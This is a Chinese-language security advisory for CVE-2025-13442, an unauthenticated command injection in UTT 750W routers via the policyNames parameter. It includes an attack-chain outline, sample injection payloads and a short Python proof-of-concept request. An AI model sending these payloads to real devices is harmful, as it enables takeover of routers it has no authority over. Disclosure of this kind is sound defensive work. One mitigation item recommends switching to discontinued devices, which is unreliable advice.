IPBUF安全漏洞报告
English
CVE-2025-13442 CVSS 7.3 高危

CVE-2025-13442 UTT路由器formPdbUpConfig命令注入漏洞

披露日期: 2025-11-20

漏洞信息

漏洞编号
CVE-2025-13442
漏洞类型
命令注入
CVSS评分
7.3 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
UTT 进取 750W

相关标签

命令注入CVE-2025-13442UTT路由器网络设备漏洞远程代码执行无需认证Web接口漏洞

漏洞概述

CVE-2025-13442是发生在UTT 进取750W路由器(固件版本至3.2.2-191225)中的一个高危命令注入漏洞。该漏洞位于Web管理界面的/goform/formPdbUpConfig端点,攻击者可以通过操纵policyNames参数实现远程命令执行。漏洞无需认证即可利用,攻击者可从网络远程发起攻击。由于该漏洞已被公开披露且厂商未做出响应,建议受影响的用户立即采取防护措施。此漏洞可导致攻击者完全控制路由器设备,窃取网络流量、植入后门或进行进一步的网络攻击。

技术细节

该漏洞存在于UTT路由器Web服务器的/goform/formPdbUpConfig处理函数中。攻击者通过HTTP请求向该端点提交精心构造的policyNames参数,该参数未经充分过滤直接传递给system()函数执行。由于参数值被嵌入到系统命令中,攻击者可以使用分号、反引号或管道等shell特殊字符注入任意命令。漏洞的利用条件极为宽松:无需认证(PR:N),攻击向量为网络(AV:N),用户交互也不是必需的(UI:N)。攻击者可通过发送类似';whoami;'或'`id`'的payload到policyNames参数来实现命令注入,成功利用后可获取root权限执行任意系统命令。

攻击链分析

STEP 1
步骤1: 信息收集
攻击者识别目标UTT路由器版本,确认固件版本<=3.2.2-191225
STEP 2
步骤2: 构造恶意请求
攻击者构造HTTP POST请求到/goform/formPdbUpConfig端点,在policyNames参数中注入shell命令
STEP 3
步骤3: 命令注入执行
服务器将policyNames参数值直接传递给system()函数执行,攻击者注入的命令被操作系统执行
STEP 4
步骤4: 获取控制权
攻击者成功执行命令后,可获取root权限,实现远程代码执行或植入后门

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # CVE-2025-13442 PoC - UTT Router Command Injection # Target: UTT 进取 750W (firmware <= 3.2.2-191225) # Endpoint: /goform/formPdbUpConfig # Parameter: policyNames target_url = "http://<target_ip>/goform/formPdbUpConfig" # Malicious payload - injects 'id' command payload = { "policyNames": ";id;" } try: response = requests.post(target_url, data=payload, timeout=10) print(f"Status Code: {response.status_code}") print(f"Response: {response.text}") except requests.exceptions.RequestException as e: print(f"Request failed: {e}")

影响范围

UTT 进取 750W <= 3.2.2-191225

防御指南

临时缓解措施
由于厂商未响应且无官方补丁,建议采取以下临时措施:1)通过ACL或防火墙阻止非授权IP访问路由器Web管理界面;2)关闭路由器的远程管理功能;3)监控设备日志关注可疑请求;4)考虑更换为已停止支持的老旧设备;5)部署网络入侵检测系统监控针对该漏洞的攻击尝试。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表